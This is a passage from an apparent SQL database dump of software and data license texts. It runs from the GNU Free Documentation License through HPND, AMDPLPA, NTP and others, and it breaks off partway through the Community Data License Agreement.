is a kind of \"copyleft\", which means that derivative works of\nthe document must themselves be free in the same sense. It complements the\nGNU General Public License, which is a copyleft license designed for free\nsoftware.\n\nWe have designed this License in order to use it for manuals for free software,\nbecause free software needs free documentation: a free program should come\nwith manuals providing the same freedoms that the software does. But this\nLicense is not limited to software manuals; it can be used for any textual\nwork, regardless of subject matter or whether it is published as a printed\nbook. We recommend this License principally for works whose purpose is instruction\nor reference.\n\n 1. APPLICABILITY AND DEFINITIONS\n\nThis License applies to any manual or other work, in any medium, that contains\na notice placed by the copyright holder saying it can be distributed under\nthe terms of this License. Such a notice grants a world-wide, royalty-free\nlicense, unlimited in duration, to use that work under the conditions stated\nherein. The \"Document\", below, refers to any such manual or work. Any member\nof the public is a licensee, and is addressed as \"you\". You accept the license\nif you copy, modify or distribute the work in a way requiring permission under\ncopyright law.\n\nA \"Modified Version\" of the Document means any work containing the Document\nor a portion of it, either copied verbatim, or with modifications and/or translated\ninto another language.\n\nA \"Secondary Section\" is a named appendix or a front-matter section of the\nDocument that deals exclusively with the relationship of the publishers or\nauthors of the Document to the Document\'s overall subject (or to related matters)\nand contains nothing that could fall directly within that overall subject.\n(Thus, if the Document is in part a textbook of mathematics, a Secondary Section\nmay not explain any mathematics.) The relationship could be a matter of historical\nconnection with the subject or with related matters, or of legal, commercial,\nphilosophical, ethical or political position regarding them.\n\nThe \"Invariant Sections\" are certain Secondary Sections whose titles are designated,\nas being those of Invariant Sections, in the notice that says that the Document\nis released under this License. If a section does not fit the above definition\nof Secondary then it is not allowed to be designated as Invariant. The Document\nmay contain zero Invariant Sections. If the Document does not identify any\nInvariant Sections then there are none.\n\nThe \"Cover Texts\" are certain short passages of text that are listed, as Front-Cover\nTexts or Back-Cover Texts, in the notice that says that the Document is released\nunder this License. A Front-Cover Text may be at most 5 words, and a Back-Cover\nText may be at most 25 words.\n\nA \"Transparent\" copy of the Document means a machine-readable copy, represented\nin a format whose specification is available to the general public, that is\nsuitable for revising the document straightforwardly with generic text editors\nor (for images composed of pixels) generic paint programs or (for drawings)\nsome widely available drawing editor, and that is suitable for input to text\nformatters or for automatic translation to a variety of formats suitable for\ninput to text formatters. A copy made in an otherwise Transparent file format\nwhose markup, or absence of markup, has been arranged to thwart or discourage\nsubsequent modification by readers is not Transparent. An image format is\nnot Transparent if used for any substantial amount of text. A copy that is\nnot \"Transparent\" is called \"Opaque\".\n\nExamples of suitable formats for Transparent copies include plain ASCII without\nmarkup, Texinfo input format, LaTeX input format, SGML or XML using a publicly\navailable DTD, and standard-conforming simple HTML, PostScript or PDF designed\nfor human modification. Examples of transparent image formats include PNG,\nXCF and JPG. Opaque formats include proprietary formats that can be read and\nedited only by proprietary word processors, SGML or XML for which the DTD\nand/or processing tools are not generally available, and the machine-generated\nHTML, PostScript or PDF produced by some word processors for output purposes\nonly.\n\nThe \"Title Page\" means, for a printed book, the title page itself, plus such\nfollowing pages as are needed to hold, legibly, the material this License\nrequires to appear in the title page. For works in formats which do not have\nany title page as such, \"Title Page\" means the text near the most prominent\nappearance of the work\'s title, preceding the beginning of the body of the\ntext.\n\nA section \"Entitled XYZ\" means a named subunit of the Document whose title\neither is precisely XYZ or contains XYZ in parentheses following text that\ntranslates XYZ in another language. (Here XYZ stands for a specific section\nname mentioned below, such as \"Acknowledgements\", \"Dedications\", \"Endorsements\",\nor \"History\".) To \"Preserve the Title\" of such a section when you modify the\nDocument means that it remains a section \"Entitled XYZ\" according to this\ndefinition.\n\nThe Document may include Warranty Disclaimers next to the notice which states\nthat this License applies to the Document. These Warranty Disclaimers are\nconsidered to be included by reference in this License, but only as regards\ndisclaiming warranties: any other implication that these Warranty Disclaimers\nmay have is void and has no effect on the meaning of this License.\n\n 2. VERBATIM COPYING\n\nYou may copy and distribute the Document in any medium, either commercially\nor noncommercially, provided that this License, the copyright notices, and\nthe license notice saying this License applies to the Document are reproduced\nin all copies, and that you add no other conditions whatsoever to those of\nthis License. You may not use technical measures to obstruct or control the\nreading or further copying of the copies you make or distribute. However,\nyou may accept compensation in exchange for copies. If you distribute a large\nenough number of copies you must also follow the conditions in section 3.\n\nYou may also lend copies, under the same conditions stated above, and you\nmay publicly display copies.\n\n 3. COPYING IN QUANTITY\n\nIf you publish printed copies (or copies in media that commonly have printed\ncovers) of the Document, numbering more than 100, and the Document\'s license\nnotice requires Cover Texts, you must enclose the copies in covers that carry,\nclearly and legibly, all these Cover Texts: Front-Cover Texts on the front\ncover, and Back-Cover Texts on the back cover. Both covers must also clearly\nand legibly identify you as the publisher of these copies. The front cover\nmust present the full title with all words of the title equally prominent\nand visible. You may add other material on the covers in addition. Copying\nwith changes limited to the covers, as long as they preserve the title of\nthe Document and satisfy these conditions, can be treated as verbatim copying\nin other respects.\n\nIf the required texts for either cover are too voluminous to fit legibly,\nyou should put the first ones listed (as many as fit reasonably) on the actual\ncover, and continue the rest onto adjacent pages.\n\nIf you publish or distribute Opaque copies of the Document numbering more\nthan 100, you must either include a machine-readable Transparent copy along\nwith each Opaque copy, or state in or with each Opaque copy a computer-network\nlocation from which the general network-using public has access to download\nusing public-standard network protocols a complete Transparent copy of the\nDocument, free of added material. If you use the latter option, you must take\nreasonably prudent steps, when you begin distribution of Opaque copies in\nquantity, to ensure that this Transparent copy will remain thus accessible\nat the stated location until at least one year after the last time you distribute\nan Opaque copy (directly or through your agents or retailers) of that edition\nto the public.\n\nIt is requested, but not required, that you contact the authors of the Document\nwell before redistributing any large number of copies, to give them a chance\nto provide you with an updated version of the Document.\n\n 4. MODIFICATIONS\n\nYou may copy and distribute a Modified Version of the Document under the conditions\nof sections 2 and 3 above, provided that you release the Modified Version\nunder precisely this License, with the Modified Version filling the role of\nthe Document, thus licensing distribution and modification of the Modified\nVersion to whoever possesses a copy of it. In addition, you must do these\nthings in the Modified Version:\n\nA. Use in the Title Page (and on the covers, if any) a title distinct from\nthat of the Document, and from those of previous versions (which should, if\nthere were any, be listed in the History section of the Document). You may\nuse the same title as a previous version if the original publisher of that\nversion gives permission.\n\nB. List on the Title Page, as authors, one or more persons or entities responsible\nfor authorship of the modifications in the Modified Version, together with\nat least five of the principal authors of the Document (all of its principal\nauthors, if it has fewer than five), unless they release you from this requirement.\n\nC. State on the Title page the name of the publisher of the Modified Version,\nas the publisher.\n\n D. Preserve all the copyright notices of the Document.\n\nE. Add an appropriate copyright notice for your modifications adjacent to\nthe other copyright notices.\n\nF. Include, immediately after the copyright notices, a license notice giving\nthe public permission to use the Modified Version under the terms of this\nLicense, in the form shown in the Addendum below.\n\nG. Preserve in that license notice the full lists of Invariant Sections and\nrequired Cover Texts given in the Document\'s license notice.\n\n H. Include an unaltered copy of this License.\n\nI. Preserve the section Entitled \"History\", Preserve its Title, and add to\nit an item stating at least the title, year, new authors, and publisher of\nthe Modified Version as given on the Title Page. If there is no section Entitled\n\"History\" in the Document, create one stating the title, year, authors, and\npublisher of the Document as given on its Title Page, then add an item describing\nthe Modified Version as stated in the previous sentence.\n\nJ. Preserve the network location, if any, given in the Document for public\naccess to a Transparent copy of the Document, and likewise the network locations\ngiven in the Document for previous versions it was based on. These may be\nplaced in the \"History\" section. You may omit a network location for a work\nthat was published at least four years before the Document itself, or if the\noriginal publisher of the version it refers to gives permission.\n\nK. For any section Entitled \"Acknowledgements\" or \"Dedications\", Preserve\nthe Title of the section, and preserve in the section all the substance and\ntone of each of the contributor acknowledgements and/or dedications given\ntherein.\n\nL. Preserve all the Invariant Sections of the Document, unaltered in their\ntext and in their titles. Section numbers or the equivalent are not considered\npart of the section titles.\n\nM. Delete any section Entitled \"Endorsements\". Such a section may not be included\nin the Modified Version.\n\nN. Do not retitle any existing section to be Entitled \"Endorsements\" or to\nconflict in title with any Invariant Section.\n\n O. Preserve any Warranty Disclaimers.\n\nIf the Modified Version includes new front-matter sections or appendices that\nqualify as Secondary Sections and contain no material copied from the Document,\nyou may at your option designate some or all of these sections as invariant.\nTo do this, add their titles to the list of Invariant Sections in the Modified\nVersion\'s license notice. These titles must be distinct from any other section\ntitles.\n\nYou may add a section Entitled \"Endorsements\", provided it contains nothing\nbut endorsements of your Modified Version by various parties--for example,\nstatements of peer review or that the text has been approved by an organization\nas the authoritative definition of a standard.\n\nYou may add a passage of up to five words as a Front-Cover Text, and a passage\nof up to 25 words as a Back-Cover Text, to the end of the list of Cover Texts\nin the Modified Version. Only one passage of Front-Cover Text and one of Back-Cover\nText may be added by (or through arrangements made by) any one entity. If\nthe Document already includes a cover text for the same cover, previously\nadded by you or by arrangement made by the same entity you are acting on behalf\nof, you may not add another; but you may replace the old one, on explicit\npermission from the previous publisher that added the old one.\n\nThe author(s) and publisher(s) of the Document do not by this License give\npermission to use their names for publicity for or to assert or imply endorsement\nof any Modified Version.\n\n 5. COMBINING DOCUMENTS\n\nYou may combine the Document with other documents released under this License,\nunder the terms defined in section 4 above for modified versions, provided\nthat you include in the combination all of the Invariant Sections of all of\nthe original documents, unmodified, and list them all as Invariant Sections\nof your combined work in its license notice, and that you preserve all their\nWarranty Disclaimers.\n\nThe combined work need only contain one copy of this License, and multiple\nidentical Invariant Sections may be replaced with a single copy. If there\nare multiple Invariant Sections with the same name but different contents,\nmake the title of each such section unique by adding at the end of it, in\nparentheses, the name of the original author or publisher of that section\nif known, or else a unique number. Make the same adjustment to the section\ntitles in the list of Invariant Sections in the license notice of the combined\nwork.\n\nIn the combination, you must combine any sections Entitled \"History\" in the\nvarious original documents, forming one section Entitled \"History\"; likewise\ncombine any sections Entitled \"Acknowledgements\", and any sections Entitled\n\"Dedications\". You must delete all sections Entitled \"Endorsements\".\n\n 6. COLLECTIONS OF DOCUMENTS\n\nYou may make a collection consisting of the Document and other documents released\nunder this License, and replace the individual copies of this License in the\nvarious documents with a single copy that is included in the collection, provided\nthat you follow the rules of this License for verbatim copying of each of\nthe documents in all other respects.\n\nYou may extract a single document from such a collection, and distribute it\nindividually under this License, provided you insert a copy of this License\ninto the extracted document, and follow this License in all other respects\nregarding verbatim copying of that document.\n\n 7. AGGREGATION WITH INDEPENDENT WORKS\n\nA compilation of the Document or its derivatives with other separate and independent\ndocuments or works, in or on a volume of a storage or distribution medium,\nis called an \"aggregate\" if the copyright resulting from the compilation is\nnot used to limit the legal rights of the compilation\'s users beyond what\nthe individual works permit. When the Document is included in an aggregate,\nthis License does not apply to the other works in the aggregate which are\nnot themselves derivative works of the Document.\n\nIf the Cover Text requirement of section 3 is applicable to these copies of\nthe Document, then if the Document is less than one half of the entire aggregate,\nthe Document\'s Cover Texts may be placed on covers that bracket the Document\nwithin the aggregate, or the electronic equivalent of covers if the Document\nis in electronic form. Otherwise they must appear on printed covers that bracket\nthe whole aggregate.\n\n 8. TRANSLATION\n\nTranslation is considered a kind of modification, so you may distribute translations\nof the Document under the terms of section 4. Replacing Invariant Sections\nwith translations requires special permission from their copyright holders,\nbut you may include translations of some or all Invariant Sections in addition\nto the original versions of these Invariant Sections. You may include a translation\nof this License, and all the license notices in the Document, and any Warranty\nDisclaimers, provided that you also include the original English version of\nthis License and the original versions of those notices and disclaimers. In\ncase of a disagreement between the translation and the original version of\nthis License or a notice or disclaimer, the original version will prevail.\n\nIf a section in the Document is Entitled \"Acknowledgements\", \"Dedications\",\nor \"History\", the requirement (section 4) to Preserve its Title (section 1)\nwill typically require changing the actual title.\n\n 9. TERMINATION\n\nYou may not copy, modify, sublicense, or distribute the Document except as\nexpressly provided for under this License. Any other attempt to copy, modify,\nsublicense or distribute the Document is void, and will automatically terminate\nyour rights under this License. However, parties who have received copies,\nor rights, from you under this License will not have their licenses terminated\nso long as such parties remain in full compliance.\n\n 10. FUTURE REVISIONS OF THIS LICENSE\n\nThe Free Software Foundation may publish new, revised versions of the GNU\nFree Documentation License from time to time. Such new versions will be similar\nin spirit to the present version, but may differ in detail to address new\nproblems or concerns. See http://www.gnu.org/copyleft/.\n\nEach version of the License is given a distinguishing version number. If the\nDocument specifies that a particular numbered version of this License \"or\nany later version\" applies to it, you have the option of following the terms\nand conditions either of that specified version or of any later version that\nhas been published (not as a draft) by the Free Software Foundation. If the\nDocument does not specify a version number of this License, you may choose\nany version ever published (not as a draft) by the Free Software Foundation.\nADDENDUM: How to use this License for your documents\n\nTo use this License in a document you have written, include a copy of the\nLicense in the document and put the following copyright and license notices\njust after the title page:\n\nCopyright (c) YEAR YOUR NAME. Permission is granted to copy, distribute and/or\nmodify this document under the terms of the GNU Free Documentation License,\nVersion 1.2 or any later version published by the Free Software Foundation;\nwith no Invariant Sections, no Front-Cover Texts, and no Back-Cover Texts.\nA copy of the license is included in the section entitled \"GNU Free Documentation\nLicense\".\n\nIf you have Invariant Sections, Front-Cover Texts and Back-Cover Texts, replace\nthe \"with...Texts.\" line with this:\n\nwith the Invariant Sections being LIST THEIR TITLES, with the Front-Cover\nTexts being LIST, and with the Back-Cover Texts being LIST.\n\nIf you have Invariant Sections without Cover Texts, or some other combination\nof the three, merge those two alternatives to suit the situation.\n\nIf your document contains nontrivial examples of program code, we recommend\nreleasing these examples in parallel under your choice of free software license,\nsuch as the GNU General Public License, to permit their use in free software.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(287,'HPND','Historical Permission Notice and Disclaimer\n\n<copyright notice>\n\nPermission to use, copy, modify and distribute this software and its documentation\nfor any purpose and without fee is hereby granted, provided that the above\ncopyright notice appear in all copies , and that both that the copyright notice\nand this permission notice appear in supporting documentation , and that the\nname of <copyright holder> <or related entities> not be used in advertising\nor publicity pertaining to distribution of the software without specific,\nwritten prior permission . <copyright holder> makes no representations about\nthe suitability of this software for any purpose. It is provided \"as is\" without\nexpress or implied warranty. <copyright holder> DISCLAIMS ALL WARRANTIES WITH\nREGARD TO THIS SOFTWARE, INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY\nAND FITNESS . IN NO EVENT SHALL <copyright holder> BE LIABLE FOR ANY SPECIAL,\nINDIRECT OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM\nLOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE\nOR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR\nPERFORMANCE OF THIS SOFTWARE.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(288,'LZMA-exception','I.6 Special exception for LZMA compression module LZMA exception\n\nIgor Pavlov and Amir Szekely, the authors of the LZMA compression module for NSIS, expressly permit you to statically or dynamically link your code (or bind by name) to the files from the LZMA compression module for NSIS without subjecting your linked code to the terms of the Common Public license version 1.0. Any modifications or additions to files from the LZMA compression module for NSIS, however, are subject to the terms of the Common Public License version 1.0.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(289,'AMDPLPA','Copyright (c) 2006, 2007 Advanced Micro Devices, Inc.\n\nAll rights reserved.\n\nRedistribution and use in any form of this material and any product thereof\nincluding software in source or binary forms, along with any related documentation,\nwith or without modification (\"this material\"), is permitted provided that\nthe following conditions are met:\n\nRedistributions of source code of any software must retain the above copyright\nnotice and all terms of this license as part of the code.\n\nRedistributions in binary form of any software must reproduce the above copyright\nnotice and all terms of this license in any related documentation and/or other\nmaterials.\n\nNeither the names nor trademarks of Advanced Micro Devices, Inc. or any copyright\nholders or contributors may be used to endorse or promote products derived\nfrom this material without specific prior written permission.\n\nNotice about U.S. Government restricted rights: This material is provided\nwith \"RESTRICTED RIGHTS.\" Use, duplication or disclosure by the U.S. Government\nis subject to the full extent of restrictions set forth in FAR52.227 and DFARS252.227\net seq., or any successor or applicable regulations. Use of this material\nby the U.S. Government constitutes acknowledgment of the proprietary rights\nof Advanced Micro Devices, Inc. and any copyright holders and contributors.\n\nANY BREACH OF ANY TERM OF THIS LICENSE SHALL RESULT IN THE IMMEDIATE REVOCATION\nOF ALL RIGHTS TO REDISTRIBUTE, ACCESS OR USE THIS MATERIAL.\n\nTHIS MATERIAL IS PROVIDED BY ADVANCED MICRO DEVICES, INC. AND ANY COPYRIGHT\nHOLDERS AND CONTRIBUTORS \"AS IS\" IN ITS CURRENT CONDITION AND WITHOUT ANY\nREPRESENTATIONS, GUARANTEE, OR WARRANTY OF ANY KIND OR IN ANY WAY RELATED\nTO SUPPORT, INDEMNITY, ERROR FREE OR UNINTERRUPTED OPERATION, OR THAT IT IS\nFREE FROM DEFECTS OR VIRUSES. ALL OBLIGATIONS ARE HEREBY DISCLAIMED - WHETHER\nEXPRESS, IMPLIED, OR STATUTORY - INCLUDING, BUT NOT LIMITED TO, ANY IMPLIED\nWARRANTIES OF TITLE, MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, ACCURACY,\nCOMPLETENESS, OPERABILITY, QUALITY OF SERVICE, OR NON-INFRINGEMENT. IN NO\nEVENT SHALL ADVANCED MICRO DEVICES, INC. OR ANY COPYRIGHT HOLDERS OR CONTRIBUTORS\nBE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, PUNITIVE, EXEMPLARY,\nOR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE\nGOODS OR SERVICES; LOSS OF USE, REVENUE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)\nHOWEVER CAUSED OR BASED ON ANY THEORY OF LIABILITY ARISING IN ANY WAY RELATED\nTO THIS MATERIAL, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. THE ENTIRE\nAND AGGREGATE LIABILITY OF ADVANCED MICRO DEVICES, INC. AND ANY COPYRIGHT\nHOLDERS AND CONTRIBUTORS SHALL NOT EXCEED TEN DOLLARS (US $10.00). ANYONE\nREDISTRIBUTING OR ACCESSING OR USING THIS MATERIAL ACCEPTS THIS ALLOCATION\nOF RISK AND AGREES TO RELEASE ADVANCED MICRO DEVICES, INC. AND ANY COPYRIGHT\nHOLDERS AND CONTRIBUTORS FROM ANY AND ALL LIABILITIES, OBLIGATIONS, CLAIMS,\nOR DEMANDS IN EXCESS OF TEN DOLLARS (US $10.00). THE FOREGOING ARE ESSENTIAL\nTERMS OF THIS LICENSE AND, IF ANY OF THESE TERMS ARE CONSTRUED AS UNENFORCEABLE,\nFAIL IN ESSENTIAL PURPOSE, OR BECOME VOID OR DETRIMENTAL TO ADVANCED MICRO\nDEVICES, INC. OR ANY COPYRIGHT HOLDERS OR CONTRIBUTORS FOR ANY REASON, THEN\nALL RIGHTS TO REDISTRIBUTE, ACCESS OR USE THIS MATERIAL SHALL TERMINATE IMMEDIATELY.\nMOREOVER, THE FOREGOING SHALL SURVIVE ANY EXPIRATION OR TERMINATION OF THIS\nLICENSE OR ANY AGREEMENT OR ACCESS OR USE RELATED TO THIS MATERIAL.\n\nNOTICE IS HEREBY PROVIDED, AND BY REDISTRIBUTING OR ACCESSING OR USING THIS\nMATERIAL SUCH NOTICE IS ACKNOWLEDGED, THAT THIS MATERIAL MAY BE SUBJECT TO\nRESTRICTIONS UNDER THE LAWS AND REGULATIONS OF THE UNITED STATES OR OTHER\nCOUNTRIES, WHICH INCLUDE BUT ARE NOT LIMITED TO, U.S. EXPORT CONTROL LAWS\nSUCH AS THE EXPORT ADMINISTRATION REGULATIONS AND NATIONAL SECURITY CONTROLS\nAS DEFINED THEREUNDER, AS WELL AS STATE DEPARTMENT CONTROLS UNDER THE U.S.\nMUNITIONS LIST. THIS MATERIAL MAY NOT BE USED, RELEASED, TRANSFERRED, IMPORTED,\nEXPORTED AND/OR RE- EXPORTED IN ANY MANNER PROHIBITED UNDER ANY APPLICABLE\nLAWS, INCLUDING U.S. EXPORT CONTROL LAWS REGARDING SPECIFICALLY DESIGNATED\nPERSONS, COUNTRIES AND NATIONALS OF COUNTRIES SUBJECT TO NATIONAL SECURITY\nCONTROLS. MOREOVER, THE FOREGOING SHALL SURVIVE ANY EXPIRATION OR TERMINATION\nOF ANY LICENSE OR AGREEMENT OR ACCESS OR USE RELATED TO THIS MATERIAL.\n\nThis license forms the entire agreement regarding the subject matter hereof\nand supersedes all proposals and prior discussions and writings between the\nparties with respect thereto. This license does not affect any ownership,\nrights, title, or interest in, or relating to, this material. No terms of\nthis license can be modified or waived, and no breach of this license can\nbe excused, unless done so in a writing signed by all affected parties. Each\nterm of this license is separately enforceable. If any term of this license\nis determined to be or becomes unenforceable or illegal, such term shall be\nreformed to the minimum extent necessary in order for this license to remain\nin effect in accordance with its terms as modified by such reformation. This\nlicense shall be governed by and construed in accordance with the laws of\nthe State of Texas without regard to rules on conflicts of law of any state\nor jurisdiction or the United Nations Convention on the International Sale\nof Goods. All disputes arising out of this license shall be subject to the\njurisdiction of the federal and state courts in Austin, Texas, and all defenses\nare hereby waived concerning personal jurisdiction and venue of these courts.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(290,'Naumen','NAUMEN Public License\n\nThis software is Copyright (c) NAUMEN (tm) and Contributors. All rights reserved.\n\nRedistribution and use in source and binary forms, with or without modification,\nare permitted provided that the following conditions are met:\n\n1. Redistributions in source code must retain the above copyright notice,\nthis list of conditions, and the following disclaimer.\n\n2. Redistributions in binary form must reproduce the above copyright notice,\nthis list of conditions, and the following disclaimer in the documentation\nand/or other materials provided with the distribution.\n\n3. The name NAUMEN (tm) must not be used to endorse or promote products derived\nfrom this software without prior written permission from NAUMEN.\n\n4. The right to distribute this software or to use it for any purpose does\nnot give you the right to use Servicemarks (sm) or Trademarks (tm) of NAUMEN.\n\n5. If any files originating from NAUMEN or Contributors are modified, you\nmust cause the modified files to carry prominent notices stating that you\nchanged the files and the date of any change.\n\nDisclaimer:\n\nTHIS SOFTWARE IS PROVIDED BY NAUMEN \"AS IS\" AND ANY EXPRESSED OR IMPLIED WARRANTIES,\nINCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND\nFITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL NAUMEN\nOR ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,\nEXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\nOF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS\nINTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,\nSTRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY\nWAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF\nSUCH DAMAGE.\n\nThis software consists of contributions made by NAUMEN and Contributors. Specific\nattributions are listed in the accompanying credits file.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(291,'Adobe-2006','Adobe Systems Incorporated(r) Source Code License Agreement\n\nCopyright(c) 2006 Adobe Systems Incorporated. All rights reserved.\n\nPlease read this Source Code License Agreement carefully before using the\nsource code.\n\nAdobe Systems Incorporated grants to you a perpetual, worldwide, non-exclusive,\nno-charge, royalty-free, irrevocable copyright license, to reproduce, prepare\nderivative works of, publicly display, publicly perform, and distribute this\nsource code and such derivative works in source or object code form without\nany attribution requirements.\n\nThe name \"Adobe Systems Incorporated\" must not be used to endorse or promote\nproducts derived from the source code without prior written permission.\n\nYou agree to indemnify, hold harmless and defend Adobe Systems Incorporated\nfrom and against any loss, damage, claims or lawsuits, including attorney\'s\nfees that arise or result from your use or distribution of the source code.\n\nTHIS SOURCE CODE IS PROVIDED \"AS IS\" AND \"WITH ALL FAULTS\", WITHOUT ANY TECHNICAL\nSUPPORT OR ANY EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED\nTO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\nPURPOSE ARE DISCLAIMED. ALSO, THERE IS NO WARRANTY OF NON-INFRINGEMENT, TITLE\nOR QUIET ENJOYMENT. IN NO EVENT SHALL MACROMEDIA OR ITS SUPPLIERS BE LIABLE\nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE\nUSE OF THIS SOURCE CODE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(292,'APAFML','Copyright (c) 1985, 1987, 1989, 1990, 1991, 1992, 1993, 1997 Adobe Systems\nIncorporated. All Rights Reserved.\n\nThis file and the 14 PostScript(R) AFM files it accompanies may be used, copied,\nand distributed for any purpose and without charge, with or without modification,\nprovided that all copyright notices are retained; that the AFM files are not\ndistributed without this file; that all modifications to this file or any\nof the AFM files are prominently noted in the modified file(s); and that this\nparagraph is not modified. Adobe Systems has no responsibility or obligation\nto support the use of the AFM files.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(293,'OML','This FastCGI application library source and object code (the \"Software\") and\nits documentation (the \"Documentation\") are copyrighted by Open Market, Inc\n(\"Open Market\"). The following terms apply to all files associated with the\nSoftware and Documentation unless explicitly disclaimed in individual files.\n\nOpen Market permits you to use, copy, modify, distribute, and license this\nSoftware and the Documentation for any purpose, provided that existing copyright\nnotices are retained in all copies and that this notice is included verbatim\nin any distributions. No written agreement, license, or royalty fee is required\nfor any of the authorized uses. Modifications to this Software and Documentation\nmay be copyrighted by their authors and need not follow the licensing terms\ndescribed here. If modifications to this Software and Documentation have new\nlicensing terms, the new terms must be clearly indicated on the first page\nof each file where they apply.\n\nOPEN MARKET MAKES NO EXPRESS OR IMPLIED WARRANTY WITH RESPECT TO THE SOFTWARE\nOR THE DOCUMENTATION, INCLUDING WITHOUT LIMITATION ANY WARRANTY OF MERCHANTABILITY\nOR FITNESS FOR A PARTICULAR PURPOSE. IN NO EVENT SHALL OPEN MARKET BE LIABLE\nTO YOU OR ANY THIRD PARTY FOR ANY DAMAGES ARISING FROM OR RELATING TO THIS\nSOFTWARE OR THE DOCUMENTATION, INCLUDING, WITHOUT LIMITATION, ANY INDIRECT,\nSPECIAL OR CONSEQUENTIAL DAMAGES OR SIMILAR DAMAGES, INCLUDING LOST PROFITS\nOR LOST DATA, EVEN IF OPEN MARKET HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH\nDAMAGES. THE SOFTWARE AND DOCUMENTATION ARE PROVIDED \"AS IS\". OPEN MARKET\nHAS NO LIABILITY IN CONTRACT, TORT, NEGLIGENCE OR OTHERWISE ARISING OUT OF\nTHIS SOFTWARE OR THE DOCUMENTATION.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(294,'NTP','NTP License (NTP)\n\nCopyright (c) (CopyrightHoldersName) (From 4-digit-year)-(To 4-digit-year)\n\nPermission to use, copy, modify, and distribute this software and its documentation\nfor any purpose with or without fee is hereby granted, provided that the above\ncopyright notice appears in all copies and that both the copyright notice\nand this permission notice appear in supporting documentation, and that the\nname (TrademarkedName) not be used in advertising or publicity pertaining\nto distribution of the software without specific, written prior permission.\n(TrademarkedName) makes no representations about the suitability this software\nfor any purpose. It is provided \"as is\" without express or implied warranty.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(295,'CDLA-Sharing-1.0','Community Data License Agreement - Sharing - Version 1.0\n\nThis is the Community Data License Agreement - Sharing, Version 1.0 (\"Agreement\").\nData is provided to You under this Agreement by each of the Data Providers.\nYour exercise of any of the rights and permissions granted below constitutes\nYour acceptance and agreement to be bound by the terms and conditions of this\nAgreement.\n\nThe benefits that each Data Provider receives from making Data available and\nthat You receive from Data or otherwise under these terms and conditions shall\nbe deemed sufficient consideration for the formation of this Agreement. Accordingly,\nData Provider(s) and You (the \"Parties\") agree as follows:\n\n Section 1. Definitions\n\n1.1 \"Add\" means to supplement Data with Your own or someone else\'s Data, resulting\nin Your \"Additions.\" Additions do not include Results.\n\n1.2 \"Computational Use\" means Your analysis (through the use of computational\ndevices or otherwise) or other interpretation of Data. By way of example and\nnot limitation, \"Computational Use\" includes the application of any computational\nanalytical technique, the purpose of which is the analysis of any Data in\ndigital form to generate information about Data such as patterns, trends,\ncorrelations, inferences, insights and attributes.\n\n1.3 \"Data\" means the information (including copyrightable information, such\nas images or text), collectively or individually, whether created or gathered\nby a Data Provider or an Entity acting on its behalf, to which rights are\ngranted under this Agreement.\n\n1.4 \"Data Provider\" means any Entity (including any employee or contractor\nof such Entity authorized to Publish Data on behalf of such Entity) that Publishes\nData under this Agreement prior to Your Receiving it.\n\n1.5 \"Enhanced Data\" means the subset of Data that You Publish and that is\ncomposed of (a) Your Additions and/or (b) Modifications to Data You have received\nunder this Agreement.\n\n1.6 \"Entity\" means any natural person or organization that exists under the\nlaws of the jurisdiction in which it is organized, together with all other\nentities that control, are controlled by, or are under common control with\nthat entity. For the purposes of this definition, \"control\" means (a) the\npower, directly or indirectly, to cause the direction or management of such\nentity, whether by contract or otherwise, (b) the ownership of more than fifty\npercent (50%) of the outstanding shares or securities, (c) the beneficial\nownership of such entity or, (d) the ability to appoint, whether by agreement\nor right, the majority of directors of an Entity.\n\n1.7 \"Ledger\" means a digital record of Data or grants of rights in Data governed\nby this Agreement, using any technology having functionality to record and\nstore Data or grants, contributions, or licenses to Data governed by this\nAgreement.\n\n1.8 \"Modify\" means to delete, erase, correct or re-arrange Data, resulting\nin \"Modifications.\" Modifications do not include Results.\n\n1.9 \"Publish\" means to make all or a subset of Data (including Your 